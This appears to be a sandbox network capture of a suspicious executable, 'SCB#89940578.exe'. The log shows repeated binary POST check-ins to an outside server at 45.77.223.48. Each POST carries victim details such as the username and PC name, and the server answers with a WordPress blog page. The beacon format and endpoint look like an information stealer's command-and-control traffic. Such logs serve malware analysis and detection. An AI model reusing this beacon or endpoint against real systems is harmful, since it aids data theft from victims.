Apr 26, 2024 04:42:50.141944885 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:51.026690960 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:50 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:51.026801109 CEST	22	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 Data Ascii: <!DOCTYPE html><html
Apr 26, 2024 04:42:51.026854992 CEST	37	IN	Data Raw: 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:51.026928902 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:51.035284042 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:51.036096096 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:51.036200047 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:51.036282063 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:51.036546946 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:51.036678076 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49773	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:51.405219078 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:51.593858957 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:52.499456882 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:51 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:52.499512911 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:52.507549047 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:52.507801056 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:52.508023024 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:52.508090019 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:52.508318901 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:52.508332014 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:52.508450031 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:52.508497000 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49774	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:52.847994089 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:53.035687923 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:53.907716990 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:52 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:53.907912970 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:53.916510105 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:53.916714907 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:53.916788101 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:53.916976929 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:53.917152882 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:53.917218924 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:53.917546034 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:54.097213984 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49775	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:54.249805927 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:54.436537027 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:55.362730980 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:54 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:55.363073111 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:55.363189936 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:55.371556044 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:55.371814966 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:55.372040033 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:55.372121096 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:42:55.372193098 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:42:55.372267008 CEST	761	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:42:55.550056934 CEST	1289	IN	Data Raw: 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f Data Ascii: <style id='wp-block-social-links-inline-css'>.wp-block-social-links{background:none;box-sizing:border-box;margin-left:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-li

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49777	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:42:55.707370996 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:42:55.899482012 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:42:56.796880960 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:42:55 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:42:56.796926022 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:42:56.797019005 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:42:56.805852890 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:42:56.806443930 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:42:56.806940079 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:42:56.807007074 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:42:56.807327986 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
